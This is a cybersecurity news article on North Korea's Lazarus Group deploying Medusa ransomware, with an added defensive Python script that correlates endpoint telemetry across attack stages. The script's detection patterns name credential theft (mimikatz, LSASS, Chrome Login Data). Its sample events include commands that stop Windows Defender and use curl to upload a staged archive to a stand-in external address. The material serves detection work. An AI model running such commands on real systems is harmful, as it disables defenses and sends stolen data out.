North Korean Lazarus Group Expands Global Attacks with Medusa Ransomware

Recent developments reveal that North Korean cyber operations are making significant inroads into the commercial ransomware landscape, indicating a heightened focus on direct financial gain. The Symantec and Carbon Black Threat Hunter Team has reported that the notorious Lazarus Group, a state-sponsored actor, deployed Medusa ransomware against targets in the Middle East and attempted to infiltrate healthcare organizations in the United States.

Although the attempts to breach U.S. institutions were ultimately unsuccessful, this incident underscores a trend where state-sponsored groups are increasingly leveraging established cybercrime tools to circumvent traditional security measures.

Medusa operates on a ransomware-as-a-service model: affiliates use it to lock down targeted networks and demand ransom, with the proceeds split between the affiliate and the ransomware's operators. Since its emergence in 2023, the group associated with this ransomware has reportedly executed over 300 successful attacks, affecting significant entities such as Comcast and NASCAR.

By working through Medusa, Lazarus gains ready-made infrastructure and can hide behind the persona of an ordinary cybercriminal operation, complicating attribution for security researchers and law enforcement.

Recent victims identified on the Medusa ransomware dark web leak site, as captured by Hackread.com.

Multi-Stage Attack Chain

As detailed in a blog post from Symantec shared with Hackread.com, Lazarus’s operations utilize a multi-stage methodology, deploying Medusa ransomware only at the final stage. Initially, the group employs a specialized toolkit to dismantle local security defenses. Following this, they install tailored backdoors and trojans, such as Blindingcan and Comebacker, establishing persistent access to breached networks.

The attack progresses with credential theft tools, including ChromeStealer and Mimikatz, to capture passwords. In parallel, a tool called Infohook collects and stages sensitive data for exfiltration. To transfer the stolen data without drawing attention, the group routes traffic internally through RP_Proxy and uses the command-line utility Curl to send files back to its servers. By the time Medusa is deployed, the attackers have already taken full control of the network and extracted the most valuable data.
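The ordering of those stages is the point a defender can act on: the data has already left the network before the encryptor runs, so detection has to key on the earlier stages rather than on the ransomware itself. The script below is an added example, not code from Symantec, Hackread or the campaign's tooling. It correlates constructed endpoint telemetry per host against generic behavioural patterns for each stage (a security service stopped, a new service or Run key, access to a browser credential store or LSASS, archive creation, a Curl upload to a host outside an allowlist, mass file renames) and raises an alert once a host has crossed three stages, while reporting which stages were visible before any encryption activity. The patterns, the allowlist, the host names and the 203.0.113.7 address are illustrative assumptions, not indicators from the report.

```python
"""Kill-chain stage correlation over endpoint telemetry.

Added example, not from the Symantec report or the campaign's tooling.
All events below are constructed; the patterns are generic behavioural
heuristics a defender might start from, not campaign signatures.
"""
import re
from collections import defaultdict

# Stages of the chain described in the article, in the order they occur.
STAGES = ["defense_disable", "backdoor", "credential_theft",
          "staging", "exfiltration", "encryption"]

# Assumption: hosts the organisation legitimately uploads data to.
ALLOWED_UPLOAD_HOSTS = {"backup.corp.example", "storage.corp.example"}
MASS_RENAME_THRESHOLD = 200   # renames in one event window that suggest encryption

# Illustrative patterns, each mapping a matching event to one stage.
PATTERNS = {
    "defense_disable": re.compile(
        r"\b(net|sc)(\.exe)?\s+stop\s+\S*(defend|sense|mpssvc)|Set-MpPreference\s+-Disable", re.I),
    "backdoor": re.compile(
        r"\bsc(\.exe)?\s+create\b|\bschtasks(\.exe)?\s+/create\b|\breg(\.exe)?\s+add\b.*\\Run\b", re.I),
    "credential_theft": re.compile(r"mimikatz|\blsass\.exe\b|\\Login Data\b", re.I),
    "staging": re.compile(r"\b(7z|rar|tar)(\.exe)?\s+a\b|\bCompress-Archive\b", re.I),
}
# curl invoked with an upload option; the destination host is checked separately.
UPLOAD_RE = re.compile(r"\b[Cc]url(\.exe)?\b.*?(?:\s-T\s|--upload-file|--data-binary\s+@|\s-d\s+@)")
URL_HOST_RE = re.compile(r"https?://([^/\s:]+)", re.I)


def classify(event):
    """Return the chain stage one telemetry event belongs to, or None."""
    text = f"{event.get('proc', '')} {event.get('cmdline', '')} {event.get('target', '')}"
    if event.get("file_renames", 0) >= MASS_RENAME_THRESHOLD:
        return "encryption"
    if UPLOAD_RE.search(text):
        m = URL_HOST_RE.search(text)
        host = m.group(1).lower() if m else ""
        # Uploads to the allowlist are routine; anything else counts as exfiltration.
        return None if host in ALLOWED_UPLOAD_HOSTS else "exfiltration"
    for stage, pattern in PATTERNS.items():
        if pattern.search(text):
            return stage
    return None


def correlate(events, min_stages=3):
    """Group events by host and flag hosts that crossed `min_stages` stages.

    Also reports which stages fired before encryption: that is the window in
    which the intrusion was visible ahead of the ransomware.
    """
    seen = defaultdict(dict)                       # host -> {stage: first ts}
    for ev in sorted(events, key=lambda e: e["ts"]):
        host_stages = seen[ev["host"]]
        stage = classify(ev)
        if stage and stage not in host_stages:
            host_stages[stage] = ev["ts"]
    report = {}
    for host, stages in seen.items():
        ordered = [s for s in STAGES if s in stages]
        enc_ts = stages.get("encryption")
        report[host] = {
            "stages": ordered,
            "first_seen": {s: stages[s] for s in ordered},
            "alert": len(ordered) >= min_stages,
            "pre_encryption_stages": [s for s in ordered if s != "encryption"
                                      and (enc_ts is None or stages[s] < enc_ts)],
        }
    return report


# Constructed telemetry for two hosts; 203.0.113.7 is a documentation address.
SAMPLE_EVENTS = [
    {"ts": "2025-01-10T09:02:00", "host": "ws-finance-07", "proc": "cmd.exe",
     "cmdline": "sc stop WinDefend"},
    {"ts": "2025-01-10T09:05:00", "host": "ws-finance-07", "proc": "cmd.exe",
     "cmdline": r"sc create SysUpdateSvc binPath= C:\ProgramData\svc\upd.exe start= auto"},
    {"ts": "2025-01-10T09:30:00", "host": "ws-finance-07", "proc": "updater.exe",
     "target": r"C:\Users\jdoe\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"ts": "2025-01-10T10:10:00", "host": "ws-finance-07", "proc": "7z.exe",
     "cmdline": r"7z a C:\ProgramData\tmp\out.7z C:\Shares\HR"},
    {"ts": "2025-01-10T10:40:00", "host": "ws-finance-07", "proc": "curl.exe",
     "cmdline": r"curl.exe -T C:\ProgramData\tmp\out.7z https://203.0.113.7/up"},
    {"ts": "2025-01-10T11:30:00", "host": "ws-finance-07", "proc": "enc.exe",
     "file_renames": 1500},
    {"ts": "2025-01-10T11:00:00", "host": "ws-it-02", "proc": "curl.exe",
     "cmdline": r"curl.exe -T C:\backups\db.bak https://backup.corp.example/put"},
]

if __name__ == "__main__":
    for host, info in correlate(SAMPLE_EVENTS).items():
        print(host, "ALERT" if info["alert"] else "ok", info["stages"])
```

On the constructed data, ws-finance-07 trips the alert at the credential theft stage, two hours before the mass renames begin, while ws-it-02's upload to an allowlisted backup host produces nothing. The threshold of three stages is a tuning knob: a lower value catches intrusions earlier at the cost of more noise from administrators who legitimately stop services and create scheduled tasks.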

Targets: Vulnerable Institutions

A closer examination of the attack targets reveals a distinct focus on organizations that provide essential social services. In recent months, the Medusa leak site has identified various U.S. victims, including a mental health nonprofit and an educational institution supporting children with autism. These attacks typically involve ransom demands averaging around $260,000, strategically set high enough for a significant payout while remaining low enough to tempt desperate organizations into compliance.

Not The First Time

This collaboration between a state-sponsored North Korean threat actor group and a ransomware entity is not unprecedented. In October 2024, Jumpy Pisces, also known as Onyx Sleet and Andariel, partnered with the Play ransomware group for cyberattacks, as reported by Hackread.com. Palo Alto Networks’ Unit 42 detected that these attackers utilized tools like the open-source Sliver and custom DTrack malware for lateral movement and persistent network presence.

Expert View

Jason Soroko, Senior Fellow at Sectigo, underscores the cold strategic rationale behind targeting vulnerable organizations. He observes that attacking facilities dedicated to mental health and autism services allows these groups to exert maximum emotional pressure, incentivizing rapid payments. The relatively modest average ransom suggests a volume-driven strategy focused on underfunded sectors that cannot endure extended downtime.

This trend points to a blurring line between state-sponsored espionage and street-level extortion. When entities like Lazarus ally with ransomware services like Medusa, they bring state resources to bear against smaller institutions. As a result, organizations that previously believed they were immune to international threats now find themselves caught in the crossfire of global cyber warfare, and need to reassess their data protection strategies.
